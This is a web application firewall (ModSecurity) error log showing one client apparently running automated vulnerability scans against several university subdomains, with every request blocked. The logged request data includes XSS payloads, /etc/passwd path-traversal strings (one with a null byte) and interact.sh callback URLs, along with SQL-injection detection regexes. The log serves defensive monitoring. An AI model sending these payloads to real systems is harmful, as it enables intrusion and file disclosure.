[Tue Aug 29 11:52:45.576051 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15ncCo-f0AAAoPuYQAAAAM"]
[Tue Aug 29 11:52:45.593747 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15ncCo-f0AAAoGFasAAAAE"]
[Tue Aug 29 11:52:45.599518 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53YAAAAK"]
[Tue Aug 29 11:52:45.619476 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53cAAAAK"]
[Tue Aug 29 11:52:46.608506 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15nsCo-f0AAAoO53sAAAAK"]
[Tue Aug 29 11:52:46.661875 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAnHQoAAAAAT"]
[Tue Aug 29 11:52:46.717022 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoVqooAAAAH"]
[Tue Aug 29 11:52:46.725408 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoLfKkAAAAG"]
[Tue Aug 29 11:52:46.795307 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoQ3M8AAAAN"]
[Tue Aug 29 11:52:46.840377 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoQ3NAAAAAN"]
[Tue Aug 29 11:52:46.877479 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnjjUoAAAAX"]
[Tue Aug 29 11:52:46.878753 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAmQ-28AAAAb"]
[Tue Aug 29 11:52:46.879817 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnHQoMAAAAT"]
[Tue Aug 29 11:52:46.879924 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoGFbAAAAAE"]
[Tue Aug 29 11:52:47.636651 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoW7I0AAAAJ"]
[Tue Aug 29 11:52:47.641626 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoGFbIAAAAE"]
[Tue Aug 29 11:52:47.664158 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoO54IAAAAK"]
[Tue Aug 29 11:52:47.670696 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAnjjUwAAAAX"]
[Tue Aug 29 11:52:47.684615 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoO54MAAAAK"]
[Tue Aug 29 11:52:47.688733 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15n8Co-f0AAAoVqpAAAAAH"]
[Tue Aug 29 11:52:47.692092 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAnjjU0AAAAX"]
[Tue Aug 29 11:52:47.702996 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbUAAAAE"]
[Tue Aug 29 11:52:47.706981 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoT7QMAAAAD"]
[Tue Aug 29 11:52:47.724164 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15n8Co-f0AAAoGFbYAAAAE"]
[Tue Aug 29 11:52:48.534709 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoO54UAAAAK"]
[Tue Aug 29 11:52:48.543835 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoW7I8AAAAJ"]
[Tue Aug 29 11:52:48.549270 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../..//../../ found within ARGS:dir: ../../..//../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15oMCo-f0AAAoXJq4AAAAP"]
[Tue Aug 29 11:52:48.632518 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAnjjVEAAAAX"]
[Tue Aug 29 11:52:48.702802 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAlUlw4AAAA0"]
[Tue Aug 29 11:52:48.812940 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAoLfLQAAAAG"]
[Tue Aug 29 11:52:48.816950 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15oMCo-f0AAAlUlxEAAAA0"]
[Tue Aug 29 11:52:49.545523 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoPuZcAAAAM"]
[Tue Aug 29 11:52:49.547104 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAlUlxIAAAA0"]
[Tue Aug 29 11:52:49.548477 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:f: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/learn/cubemail/filemanagement.php"] [unique_id "ZO15ocCo-f0AAAoLfLUAAAAG"]
[Tue Aug 29 11:52:49.551144 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:m. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:m: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 